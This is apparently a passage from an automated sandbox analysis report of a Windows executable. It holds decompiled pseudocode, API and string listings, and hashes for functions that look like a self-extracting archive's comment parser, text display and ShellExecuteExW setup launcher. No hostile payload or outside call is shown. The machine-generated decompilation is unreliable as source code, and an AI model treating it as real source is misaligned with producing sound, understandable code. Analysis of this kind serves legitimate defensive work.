									if( *((intOrPtr*)(_t390 - 0x4284 + _t384 - 2)) == _t370 && _t384 <= _t294 + 0xffffffe0) {
										_t304 = E00854DE5(_t366, L"*messages***", 0xb);
										_t394 = _t394 + 0xc;
										if(_t304 == 0) {
											_t390[0x1e] = 1;
											goto L24;
										}
									}
									goto L18;
								} else {
									_t307 = E008554A0(_t390 - 0x4286 + _t384, "*messages***", 0xb);
									_t394 = _t394 + 0xc;
									if(_t307 == 0) {
										L24:
										_t295 = _t390[0x1b];
										_t381 = _t384 + _t390[0x1b];
										_t390[0x19] = _t381;
										goto L26;
									}
									_t294 = _t390[0x17];
									goto L14;
								}
							}
						}
						asm("cdq");
						E00839AF0(_t390 - 0x2288, _t390, _t381, _t370, _t316);
						_push(0x200002);
						_t382 = E00852BB3(_t390 - 0x2288);
						_t390[0x1a] = _t382;
						__eflags = _t382;
						if(_t382 == 0) {
							goto L57;
						}
						_t328 = E00839A1D(_t370, _t382, 0x200000);
						_t390[0x19] = _t328;
						__eflags = _t390[0x1e];
						if(_t390[0x1e] == 0) {
							_push(2 + _t328 * 2);
							_t212 = E00852BB3(_t328);
							_t390[0x1e] = _t212;
							__eflags = _t212;
							if(_t212 == 0) {
								goto L57;
							}
							_t330 = _t390[0x19];
							 *(_t330 + _t382) = _t316;
							__eflags = _t330 + 1;
							E00841006(_t382, _t212, _t330 + 1);
							L00852BAE(_t382);
							_t382 = _t390[0x1e];
							_t333 = _t390[0x19];
							_t390[0x1a] = _t382;
							L33:
							_t215 = 0x100000;
							__eflags = _t333 - 0x100000;
							if(_t333 <= 0x100000) {
								_t215 = _t333;
							}
							 *((short*)(_t382 + _t215 * 2)) = 0;
							E0083FA8C(_t390 - 0xd4, 0x862628, 0x64);
							_push(0x20002);
							_t218 = E00852BB3(0);
							_t390[0x1b] = _t218;
							__eflags = _t218;
							if(_t218 != 0) {
								__eflags = _t390[0x19];
								_t336 = _t316;
								_t371 = _t316;
								_t390[0x1e] = _t336;
								 *_t390 = _t316;
								_t383 = _t316;
								_t390[0x17] = _t316;
								if(_t390[0x19] <= 0) {
									L54:
									E0083CB85(_t387, _t371, _t390, _t218, _t336);
									L00852BAE(_t390[0x1a]);
									L00852BAE(_t390[0x1b]);
									__eflags =  *((intOrPtr*)(_t387 + 0x2c)) - _t316;
									if( *((intOrPtr*)(_t387 + 0x2c)) <= _t316) {
										L56:
										 *0x870124 =  *((intOrPtr*)(_t387 + 0x28));
										E00855070(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x3c)),  *((intOrPtr*)(_t387 + 0x40)), 4, E0083CD5A);
										E00855070(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x50)),  *((intOrPtr*)(_t387 + 0x54)), 4, E0083CD89);
										goto L57;
									} else {
										goto L55;
									}
									do {
										L55:
										E00843406(_t387 + 0x3c, _t371, _t316);
										E00843406(_t387 + 0x50, _t371, _t316);
										_t316 = _t316 + 1;
										__eflags = _t316 -  *((intOrPtr*)(_t387 + 0x2c));
									} while (_t316 <  *((intOrPtr*)(_t387 + 0x2c)));
									goto L56;
								}
								_t390[0x14] = 0xd;
								_t390[0x13] = 0xa;
								_t390[0x15] = 9;
								do {
									_t228 = _t390[0x1a];
									__eflags = _t383;
									if(_t383 == 0) {
										L80:
										_t372 =  *(_t228 + _t383 * 2) & 0x0000ffff;
										_t383 = _t383 + 1;
										__eflags = _t372;
										if(_t372 == 0) {
											break;
										}
										__eflags = _t372 - _t390[0x11];
										if(_t372 != _t390[0x11]) {
											_t229 = 0xd;
											__eflags = _t372 - _t229;
											if(_t372 == _t229) {
												L99:
												E0083CB85(_t387, _t390[0x17], _t390, _t390[0x1b], _t336);
												 *_t390 = _t316;
												_t336 = _t316;
												_t390[0x17] = _t316;
												L98:
												_t390[0x1e] = _t336;
												goto L52;
											}
											_t232 = 0xa;
											__eflags = _t372 - _t232;
											if(_t372 == _t232) {
												goto L99;
											}
											L96:
											__eflags = _t336 - 0x10000;
											if(_t336 >= 0x10000) {
												goto L52;
											}
											 *(_t390[0x1b] + _t336 * 2) = _t372;
											_t336 = _t336 + 1;
											__eflags = _t336;
											goto L98;
										}
										__eflags = _t336 - 0x10000;
										if(_t336 >= 0x10000) {
											goto L52;
										}
										_t235 = ( *(_t228 + _t383 * 2) & 0x0000ffff) - 0x22;
										__eflags = _t235;
										if(_t235 == 0) {
											_push(0x22);
											L93:
											_pop(_t377);
											 *(_t390[0x1b] + _t336 * 2) = _t377;
											_t336 = _t336 + 1;
											_t390[0x1e] = _t336;
											_t383 = _t383 + 1;
											goto L52;
										}
										_t237 = _t235 - 0x3a;
										__eflags = _t237;
										if(_t237 == 0) {
											_push(0x5c);
											goto L93;
										}
										_t238 = _t237 - 0x12;
										__eflags = _t238;
										if(_t238 == 0) {
											_push(0xa);
											goto L93;
										}
										_t239 = _t238 - 4;
										__eflags = _t239;
										if(_t239 == 0) {
											_push(0xd);
											goto L93;
										}
										__eflags = _t239 != 0;
										if(_t239 != 0) {
											goto L96;
										}
										_push(9);
										goto L93;
									}
									_t373 =  *(_t228 + _t383 * 2 - 2) & 0x0000ffff;
									__eflags = _t373 - _t390[0x14];
									if(_t373 == _t390[0x14]) {
										L42:
										_t343 = 0x3a;
										__eflags =  *(_t228 + _t383 * 2) - _t343;
										if( *(_t228 + _t383 * 2) != _t343) {
											L71:
											_t390[0x18] = _t228 + _t383 * 2;
											_t244 = E0083F950( *(_t228 + _t383 * 2) & 0x0000ffff);
											__eflags = _t244;
											if(_t244 == 0) {
												L79:
												_t336 = _t390[0x1e];
												_t228 = _t390[0x1a];
												goto L80;
											}
											E0083FAE7(_t390 - 0x264, _t390[0x18], 0x64);
											_t248 = E00854E62(_t390 - 0x264, L" \t,");
											_t390[0x18] = _t248;
											__eflags = _t248;
											if(_t248 == 0) {
												goto L79;
											}
											 *_t248 = 0;
											E00841222(_t390 - 0x264, _t390 - 0x138, 0x64);
											E0083FA8C(_t390 - 0x70, _t390 - 0xd4, 0x64);
											E0083FA65(__eflags, _t390 - 0x70, _t390 - 0x138, 0x64);
											E0083FA8C(_t390, _t390 - 0x70, 0x32);
											_t262 = E00854EB6(_t316, 0, _t383, _t387, _t390 - 0x70,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E0083CD3F);
											_t394 = _t394 + 0x14;
											__eflags = _t262;
											if(_t262 != 0) {
												_t268 =  *_t262 * 0xc;
												__eflags = _t268;
												_t167 = _t268 + 0x86d150; // 0x28b64ee0
												_t390[0x17] =  *_t167;
											}
											_t383 = _t383 + (_t390[0x18] - _t390 - 0x264 >> 1) + 1;
											__eflags = _t383;
											_t267 = _t390[0x1a];
											_t374 = 0x20;
											while(1) {
												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
												__eflags = _t348 - _t374;
												if(_t348 == _t374) {
													goto L78;
												}
												L77:
												_t174 =  &(_t390[0x15]); // 0x9
												__eflags = _t348 -  *_t174;
												if(_t348 !=  *_t174) {
													L51:
													_t336 = _t390[0x1e];
													goto L52;
												}
												L78:
												_t383 = _t383 + 1;
												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
												__eflags = _t348 - _t374;
												if(_t348 == _t374) {
													goto L78;
												}
												goto L77;
											}
										}
										_t389 = _t390[0x1a];
										_t270 = _t228 | 0xffffffff;
										__eflags = _t270;
										_t390[0x16] = _t270;
										_t390[0xd] = L"STRINGS";
										_t390[0xe] = L"DIALOG";
										_t390[0xf] = L"MENU";
										_t390[0x10] = L"DIRECTION";
										_t390[0x18] = _t316;
										do {
											_t390[0x18] = E00852B93( *((intOrPtr*)(_t390 + 0x34 + _t316 * 4)));
											_t272 = E00854DE5(_t389 + 2 + _t383 * 2,  *((intOrPtr*)(_t390 + 0x34 + _t316 * 4)), _t271);
											_t394 = _t394 + 0x10;
											_t375 = 0x20;
											__eflags = _t272;
											if(_t272 != 0) {
												L47:
												_t273 = _t390[0x16];
												goto L48;
											}
											_t357 = _t390[0x18] + _t383;
											__eflags =  *((intOrPtr*)(_t389 + 2 + _t357 * 2)) - _t375;
											if( *((intOrPtr*)(_t389 + 2 + _t357 * 2)) > _t375) {
												goto L47;
											}
											_t273 = _t316;
											_t383 = _t357 + 1;
											_t390[0x16] = _t273;
											L48:
											_t316 = _t316 + 1;
											__eflags = _t316 - 4;
										} while (_t316 < 4);
										_t387 = _t390[0x12];
										_t316 = 0;
										__eflags = _t273;
										if(__eflags != 0) {
											_t228 = _t390[0x1a];
											if(__eflags <= 0) {
												goto L71;
											} else {
												goto L59;
											}
											while(1) {
												L59:
												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
												__eflags = _t351 - _t375;
												if(_t351 == _t375) {
													goto L61;
												}
												L60:
												_t132 =  &(_t390[0x15]); // 0x9
												__eflags = _t351 -  *_t132;
												if(_t351 !=  *_t132) {
													_t376 = _t228 + _t383 * 2;
													_t390[0x18] = _t316;
													_t274 = 0x20;
													_t352 = _t316;
													__eflags =  *_t376 - _t274;
													if( *_t376 <= _t274) {
														L66:
														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = 0;
														E00841222(_t390 - 0x19c, _t390 - 0x70, 0x64);
														_t383 = _t383 + _t390[0x18];
														_t279 = _t390[0x16];
														__eflags = _t279 - 3;
														if(_t279 != 3) {
															__eflags = _t279 - 1;
															_t280 = "$%s:";
															if(_t279 != 1) {
																_t280 = "@%s:";
															}
															E0083DA25(_t390 - 0xd4, 0x64, _t280, _t390 - 0x70);
															_t394 = _t394 + 0x10;
														} else {
															_t284 = E00852BC9(_t390 - 0x19c, _t390 - 0x19c, L"RTL");
															asm("sbb al, al");
															 *((char*)(_t387 + 0x64)) =  ~_t284 + 1;
														}
														goto L51;
													} else {
														goto L63;
													}
													while(1) {
														L63:
														__eflags = _t352 - 0x63;
														if(_t352 >= 0x63) {
															break;
														}
														_t287 =  *_t376;
														_t376 = _t376 + 2;
														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = _t287;
														_t352 = _t352 + 1;
														_t288 = 0x20;
														__eflags =  *_t376 - _t288;
														if( *_t376 > _t288) {
															continue;
														}
														break;
													}
													_t390[0x18] = _t352;
													goto L66;
												}
												L61:
												_t383 = _t383 + 1;
												L59:
												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
												__eflags = _t351 - _t375;
												if(_t351 == _t375) {
													goto L61;
												}
												goto L60;
											}
										}
										E0083FA8C(_t390 - 0xd4, 0x862628, 0x64);
										goto L51;
									}
									__eflags = _t373 - _t390[0x13];
									if(_t373 != _t390[0x13]) {
										goto L80;
									}
									goto L42;
									L52:
									__eflags = _t383 - _t390[0x19];
								} while (_t383 < _t390[0x19]);
								_t218 = _t390[0x1b];
								_t371 = _t390[0x17];
								goto L54;
							} else {
								L00852BAE(_t382);
								goto L57;
							}
						}
						_t333 = _t328 >> 1;
						_t390[0x19] = _t333;
						goto L33;
					} else {
						goto L5;
					}
					do {
						L5:
						E00843406(_t387, _t370, _t380);
						E00843406(_t387 + 0x14, _t370, _t380);
						_t380 = _t380 + 1;
						_t399 = _t380 -  *0x86d5f4; // 0x63
					} while (_t399 < 0);
					_t316 = 0;
					goto L7;
				}
			}

0x0083d019
0x0083d01a
0x0083d022
0x0083d02c
0x0083d036
0x0083d037
0x0083d038
0x0083d03b
0x0083d03d
0x0083d040
0x0083d043
0x0083d049
0x0083d04b
0x0083d04e
0x0083d054
0x0083d090
0x0083d056
0x0083d05e
0x0083d076
0x0083d080
0x0083d080
0x0083d09b
0x0083d0a0
0x0083d0a8
0x0083d0ab
0x0083d0b9
0x0083d476
0x0083d47c
0x0083d487
0x0083d492
0x0083d0bf
0x0083d0bf
0x0083d0c1
0x0083d0c7
0x0083d0e5
0x0083d0f1
0x0083d103
0x0083d108
0x0083d10b
0x0083d10e
0x0083d111
0x0083d114
0x0083d117
0x0083d12b
0x0083d140
0x0083d145
0x0083d148
0x0083d14a
0x0083d14a
0x0083d14d
0x0083d152
0x0083d211
0x0083d211
0x0083d214
0x0083d217
0x0083d228
0x0083d230
0x0083d231
0x0083d234
0x0083d239
0x00000000
0x00000000
0x0083d23f
0x0083d242
0x00000000
0x00000000
0x00000000
0x0083d242
0x00000000
0x0083d158
0x0083d160
0x0083d18b
0x0083d18d
0x0083d196
0x0083d1c1
0x0083d1c9
0x0083d1f5
0x0083d1f5
0x0083d1f9
0x00000000
0x00000000
0x0083d1fb
0x00000000
0x0083d1d5
0x0083d1e5
0x0083d1ea
0x0083d1ef
0x00000000
0x00000000
0x00000000
0x0083d1ef
0x0083d1c9
0x0083d19e
0x0083d1a4
0x0083d1b5
0x0083d1ba
0x0083d1bf
0x0083d203
0x00000000
0x0083d203
0x0083d1bf
0x00000000
0x0083d16c
0x0083d17c
0x0083d181
0x0083d186
0x0083d207
0x0083d207
0x0083d20a
0x0083d20c
0x00000000
0x0083d20c
0x0083d188
0x00000000
0x0083d188
0x0083d160
0x0083d158
0x0083d251
0x0083d254
0x0083d259
0x0083d263
0x0083d265
0x0083d269
0x0083d26b
0x00000000
0x00000000
0x0083d282
0x0083d287
0x0083d28a
0x0083d28c
0x0083d29c
0x0083d29d
0x0083d2a2
0x0083d2a6
0x0083d2a8
0x00000000
0x00000000
0x0083d2ae
0x0083d2b1
0x0083d2b4
0x0083d2b8
0x0083d2be
0x0083d2c3
0x0083d2c7
0x0083d2ca
0x0083d2cd
0x0083d2cd
0x0083d2d2
0x0083d2d4
0x0083d2d6
0x0083d2d6
0x0083d2dc
0x0083d2ec
0x0083d2f1
0x0083d2f6
0x0083d2fb
0x0083d2ff
0x0083d301
0x0083d30f
0x0083d313
0x0083d315
0x0083d317
0x0083d31a
0x0083d31d
0x0083d31f
0x0083d322
0x0083d40a
0x0083d413
0x0083d41b
0x0083d423
0x0083d42a
0x0083d42d
0x0083d447
0x0083d454
0x0083d45c
0x0083d46e
0x00000000
0x00000000
0x00000000
0x00000000
0x0083d42f
0x0083d42f
0x0083d433
0x0083d43c
0x0083d441
0x0083d442
0x0083d442
0x00000000
0x0083d42f
0x0083d328
0x0083d32f
0x0083d336
0x0083d33d
0x0083d33d
0x0083d340
0x0083d342
0x0083d63e
0x0083d63e
0x0083d642
0x0083d643
0x0083d646
0x00000000
0x00000000
0x0083d64c
0x0083d650
0x0083d6a2
0x0083d6a3
0x0083d6a6
0x0083d6cc
0x0083d6d9
0x0083d6de
0x0083d6e1
0x0083d6e3
0x0083d6c4
0x0083d6c4
0x00000000
0x0083d6c4
0x0083d6aa
0x0083d6ab
0x0083d6ae
0x00000000
0x00000000
0x0083d6b0
0x0083d6b0
0x0083d6b6
0x00000000
0x00000000
0x0083d6bf
0x0083d6c3
0x0083d6c3
0x00000000
0x0083d6c3
0x0083d652
0x0083d658
0x00000000
0x00000000
0x0083d662
0x0083d662
0x0083d665
0x0083d68c
0x0083d68e
0x0083d691
0x0083d692
0x0083d696
0x0083d697
0x0083d69a
0x00000000
0x0083d69a
0x0083d667
0x0083d667
0x0083d66a
0x0083d688
0x00000000
0x0083d688
0x0083d66c
0x0083d66c
0x0083d66f
0x0083d684
0x00000000
0x0083d684
0x0083d671
0x0083d671
0x0083d674
0x0083d680
0x00000000
0x0083d680
0x0083d677
0x0083d67a
0x00000000
0x00000000
0x0083d67c
0x00000000
0x0083d67c
0x0083d348
0x0083d34d
0x0083d351
0x0083d35d
0x0083d35f
0x0083d360
0x0083d364
0x0083d551
0x0083d554
0x0083d55b
0x0083d560
0x0083d562
0x0083d638
0x0083d638
0x0083d63b
0x00000000
0x0083d63b
0x0083d574
0x0083d585
0x0083d58a
0x0083d58f
0x0083d591
0x00000000
0x00000000
0x0083d599
0x0083d5ac
0x0083d5be
0x0083d5d0
0x0083d5df
0x0083d5f4
0x0083d5f9
0x0083d5fc
0x0083d5fe
0x0083d600
0x0083d600
0x0083d603
0x0083d609
0x0083d609
0x0083d61c
0x0083d61c
0x0083d61e
0x0083d621
0x0083d622
0x0083d622
0x0083d626
0x0083d629
0x00000000
0x00000000
0x0083d62b
0x0083d62b
0x0083d62b
0x0083d62f
0x0083d3f8
0x0083d3f8
0x00000000
0x0083d3f8
0x0083d635
0x0083d635
0x0083d622
0x0083d626
0x0083d629
0x00000000
0x00000000
0x00000000
0x0083d629
0x0083d622
0x0083d36a
0x0083d36d
0x0083d36d
0x0083d370
0x0083d373
0x0083d37a
0x0083d381
0x0083d388
0x0083d38f
0x0083d392
0x0083d3a3
0x0083d3aa
0x0083d3af
0x0083d3b4
0x0083d3b5
0x0083d3b7
0x0083d3cf
0x0083d3cf
0x00000000
0x0083d3cf
0x0083d3bc
0x0083d3be
0x0083d3c3
0x00000000
0x00000000
0x0083d3c5
0x0083d3c7
0x0083d3ca
0x0083d3d2
0x0083d3d2
0x0083d3d3
0x0083d3d3
0x0083d3d8
0x0083d3db
0x0083d3dd
0x0083d3df
0x0083d495
0x0083d498
0x00000000
0x00000000
0x00000000
0x00000000
0x0083d49e
0x0083d49e
0x0083d49e
0x0083d4a2
0x0083d4a5
0x00000000
0x00000000
0x0083d4a7
0x0083d4a7
0x0083d4a7
0x0083d4ab
0x0083d4b0
0x0083d4b3
0x0083d4b8
0x0083d4b9
0x0083d4bb
0x0083d4be
0x0083d4df
0x0083d4e1
0x0083d4f6
0x0083d4fb
0x0083d4fe
0x0083d501
0x0083d504
0x0083d527
0x0083d52a
0x0083d52f
0x0083d531
0x0083d531
0x0083d544
0x0083d549
0x0083d506
0x0083d512
0x0083d51a
0x0083d51f
0x0083d51f
0x00000000
0x00000000
0x00000000
0x00000000
0x0083d4c0
0x0083d4c0
0x0083d4c0
0x0083d4c3
0x00000000
0x00000000
0x0083d4c5
0x0083d4c8
0x0083d4cb
0x0083d4d3
0x0083d4d6
0x0083d4d7
0x0083d4da
0x00000000
0x00000000
0x00000000
0x0083d4da
0x0083d4dc
0x00000000
0x0083d4dc
0x0083d4ad
0x0083d4ad
0x0083d49e
0x0083d49e
0x0083d4a2
0x0083d4a5
0x00000000
0x00000000
0x00000000
0x0083d4a5
0x0083d49e
0x0083d3f3
0x00000000
0x0083d3f3
0x0083d353
0x0083d357
0x00000000
0x00000000
0x00000000
0x0083d3fb
0x0083d3fb
0x0083d3fb
0x0083d404
0x0083d407
0x00000000
0x0083d303
0x0083d304
0x00000000
0x0083d309
0x0083d301
0x0083d28e
0x0083d290
0x00000000
0x00000000
0x00000000
0x00000000
0x0083d0c9
0x0083d0c9
0x0083d0cc
0x0083d0d5
0x0083d0da
0x0083d0db
0x0083d0db
0x0083d0e3
0x00000000
0x0083d0e3

APIs

__EH_prolog.LIBCMT ref: 0083D022
_wcschr.LIBVCRUNTIME ref: 0083D043
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0083D05E
__fprintf_l.LIBCMT ref: 0083D544

Part of subcall function 00841006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0083B3AF,00000000,?,?,?,0004022A), ref: 00841022

Strings

a, xrefs: 0083D1CB
$%s:, xrefs: 0083D52A
@%s:, xrefs: 0083D531, 0083D53A
*messages***, xrefs: 0083D176
, xrefs: 0083D62B, 0083D4A7
*messages***, xrefs: 0083D1AF
R, xrefs: 0083D1C1
,, xrefs: 0083D57F
RTL, xrefs: 0083D50C

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 4184910265-4124877899
Opcode ID: 894bfd718a0f5f2bfd4f51305e552ddb9ba7228b0680e469d63b9099452acdf0
Instruction ID: 99da451b602eaa1864100f0c69dbdbb5082b753310de0073015d87fbbe2989c6
Opcode Fuzzy Hash: 894bfd718a0f5f2bfd4f51305e552ddb9ba7228b0680e469d63b9099452acdf0
Instruction Fuzzy Hash: 9D12037160030D9BDF24EFA8EC42AAD37A9FF90304F100169F91AD7291EB71E985CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0084C1EB, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 96
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0084C1EB(intOrPtr _a4, long _a8) {
				char _v67;
				intOrPtr _v72;
				signed int _v84;
				int _v88;
				void* _v92;
				intOrPtr _t39;
				intOrPtr _t42;
				struct HWND__* _t44;
				char _t47;

				_t44 = GetDlgItem( *0x8775e8, 0x68);
				_t47 =  *0x8775f3; // 0x1
				if(_t47 == 0) {
					_t42 =  *0x8775dc; // 0x0
					E008485DC(_t42);
					ShowWindow(_t44, 5); // executed
					SendMessageW(_t44, 0xb1, 0, 0xffffffff);
					SendMessageW(_t44, 0xc2, 0, 0x8622e4);
					 *0x8775f3 = 1;
				}
				SendMessageW(_t44, 0xb1, 0x5f5e100, 0x5f5e100);
				_v92 = 0x5c;
				SendMessageW(_t44, 0x43a, 0,  &_v92);
				_v67 = 0;
				_t39 = _a4;
				_v88 = 1;
				if(_t39 != 0) {
					_v72 = 0xa0;
					_v88 = 0x40000001;
					_v84 = _v84 & 0xbfffffff | 1;
				}
				SendMessageW(_t44, 0x444, 1,  &_v92);
				SendMessageW(_t44, 0xc2, 0, _a8);
				SendMessageW(_t44, 0xb1, 0x5f5e100, 0x5f5e100);
				if(_t39 != 0) {
					_v84 = _v84 & 0xfffffffe | 0x40000000;
					SendMessageW(_t44, 0x444, 1,  &_v92);
				}
				return SendMessageW(_t44, 0xc2, 0, L"\r\n");
			}

0x0084c208
0x0084c20f
0x0084c215
0x0084c217
0x0084c21d
0x0084c225
0x0084c234
0x0084c23e
0x0084c240
0x0084c240
0x0084c254
0x0084c25a
0x0084c26a
0x0084c26e
0x0084c272
0x0084c277
0x0084c27d
0x0084c288
0x0084c292
0x0084c29a
0x0084c29a
0x0084c2aa
0x0084c2b4
0x0084c2c3
0x0084c2c7
0x0084c2d5
0x0084c2e6
0x0084c2e6
0x0084c2fa

APIs

GetDlgItem.USER32(00000068,0088DE38), ref: 0084C1FA
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00849E02), ref: 0084C225
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0084C234
SendMessageW.USER32(00000000,000000C2,00000000,008622E4), ref: 0084C23E
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0084C254
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0084C26A
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0084C2AA
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0084C2B4
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0084C2C3
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0084C2E6
SendMessageW.USER32(00000000,000000C2,00000000,0086304C), ref: 0084C2F1

Strings

\, xrefs: 0084C25A

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$ItemShowWindow
String ID: \
API String ID: 1207805008-2967466578
Opcode ID: ff7bc03ce593fdbda8098b9099c1163f47ad2bc1d82a1e7c65f8ea0af7546824
Instruction ID: 3f6f033f43f6c2cab1a1469a4996ff18ecf26f286e643f655ba4ca0e823b1485
Opcode Fuzzy Hash: ff7bc03ce593fdbda8098b9099c1163f47ad2bc1d82a1e7c65f8ea0af7546824
Instruction Fuzzy Hash: E921E4712457487BE311EB249C45FAB7E9CFF82714F010619F690D61D1CBA59A08CAAB

Uniqueness

Uniqueness Score: -1.00%

Function 0084C487, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0084C487(struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, int _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, signed short* _a4168, intOrPtr _a4172) {
				signed short _v0;
				long _v12;
				void* __edi;
				int _t54;
				signed int _t57;
				signed short* _t58;
				long _t68;
				int _t77;
				signed int _t80;
				signed short* _t81;
				signed short _t82;
				intOrPtr _t84;
				long _t86;
				signed short* _t87;
				struct HWND__* _t89;
				signed short* _t91;
				void* _t93;
				void* _t95;
				void* _t99;

				_t54 = 0x1040;
				E0084D9C0();
				_t91 = _a4168;
				_t77 = 0;
				if( *_t91 == 0) {
					L55:
					return _t54;
				}
				_t54 = E00852B93(_t91);
				if(0x1040 >= 0x7f6) {
					goto L55;
				} else {
					_t86 = 0x3c;
					E0084E920(_t86,  &_a4, 0, _t86);
					_t84 = _a4172;
					_t99 = _t99 + 0xc;
					_a4.cbSize = _t86;
					_a8 = 0x1c0;
					if(_t84 != 0) {
						_a8 = 0x5c0;
					}
					_t80 =  *_t91 & 0x0000ffff;
					_t87 =  &(_t91[1]);
					_t95 = 0x22;
					if(_t80 != _t95) {
						_t87 = _t91;
					}
					_a20 = _t87;
					_t57 = _t77;
					if(_t80 == 0) {
						L13:
						_t58 = _a24;
						L14:
						if(_t58 == 0 ||  *_t58 == _t77) {
							if(_t84 == 0 &&  *0x87a602 != _t77) {
								_a24 = 0x87a602;
							}
						}
						_a32 = 1;
						_t93 = E0083B1F0(_t87);
						if(_t93 != 0 && E00841438(_t93, L".inf") == 0) {
							_a16 = L"Install";
						}
						if(E00839F0F(_a20) != 0) {
							_push(0x800);
							_push( &_a64);
							_push(_a20);
							E0083AF74();
							_a8 =  &_a52;
						}
						_t54 = ShellExecuteExW( &_a4); // executed
						if(_t54 != 0) {
							_t89 = _a4160;
							if( *0x8785f8 != _t77 || _a4168 != _t77 ||  *0x88de21 != _t77) {
								if(_t89 != 0) {
									_push(_t89);
									if( *0x86df24() != 0) {
										ShowWindow(_t89, _t77);
										_t77 = 1;
									}
								}
								 *0x86df20(_a56, 0x7d0);
								E0084C946(_a48);
								if( *0x88de21 != 0 && _a4160 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
									_t68 = _v12;
									if(_t68 >  *0x88de24) {
										 *0x88de24 = _t68;
									}
									 *0x88de22 = 1;
								}
							}
							CloseHandle(_a48);
							if(_t93 == 0 || E00841438(_t93, L".exe") != 0) {
								_t54 = _a4160;
								if( *0x8785f8 != 0 && _t54 == 0 &&  *0x88de21 == _t54) {
									 *0x88de28 = 0x1b58;
								}
							} else {
								_t54 = _a4160;
							}
							if(_t77 != 0 && _t54 != 0) {
								_t54 = ShowWindow(_t89, 1);
							}
						}
						goto L55;
					}
					_t81 = _t91;
					_v0 = 0x20;
					do {
						if( *_t81 == _t95) {
							while(1) {
								_t57 = _t57 + 1;
								if(_t91[_t57] == _t77) {
									break;
								}
								if(_t91[_t57] == _t95) {
									_t82 = _v0;
									_t91[_t57] = _t82;
									L10:
									if(_t91[_t57] == _t82 ||  *((short*)(_t91 + 2 + _t57 * 2)) == 0x2f) {
										if(_t91[_t57] == _v0) {
											_t91[_t57] = 0;
										}
										_t58 =  &(_t91[_t57 + 1]);
										_a24 = _t58;
										goto L14;
									} else {
										goto L12;
									}
								}
							}
						}
						_t82 = _v0;
						goto L10;
						L12:
						_t57 = _t57 + 1;
						_t81 =  &(_t91[_t57]);
					} while ( *_t81 != _t77);
					goto L13;
				}
			}

0x0084c487
0x0084c48c
0x0084c493
0x0084c49a
0x0084c49f
0x0084c6eb
0x0084c6f3
0x0084c6f3
0x0084c4a6
0x0084c4b1
0x00000000
0x0084c4b7
0x0084c4ba
0x0084c4c2
0x0084c4c7
0x0084c4ce
0x0084c4d1
0x0084c4d5
0x0084c4df
0x0084c4e1
0x0084c4e1
0x0084c4e9
0x0084c4ec
0x0084c4f2
0x0084c4f6
0x0084c4f8
0x0084c4f8
0x0084c4fa
0x0084c4fe
0x0084c503
0x0084c53b
0x0084c53b
0x0084c53f
0x0084c541
0x0084c54a
0x0084c555
0x0084c555
0x0084c54a
0x0084c55e
0x0084c56b
0x0084c56f
0x0084c580
0x0084c580
0x0084c593
0x0084c595
0x0084c59e
0x0084c59f
0x0084c5a3
0x0084c5ac
0x0084c5ac
0x0084c5b5
0x0084c5bd
0x0084c5c3
0x0084c5d6
0x0084c5eb
0x0084c5ed
0x0084c5f6
0x0084c5fa
0x0084c5fc
0x0084c5fc
0x0084c5f6
0x0084c607
0x0084c611
0x0084c61d
0x0084c63c
0x0084c646
0x0084c648
0x0084c648
0x0084c64d
0x0084c64d
0x0084c61d
0x0084c658
0x0084c660
0x0084c678
0x0084c67f
0x0084c68d
0x0084c68d
0x0084c6d5
0x0084c6d5
0x0084c6d5
0x0084c6de
0x0084c6e7
0x0084c6e7
0x0084c6de
0x00000000
0x0084c6ea
0x0084c505
0x0084c507
0x0084c50f
0x0084c512
0x0084c69f
0x0084c69f
0x0084c6a4
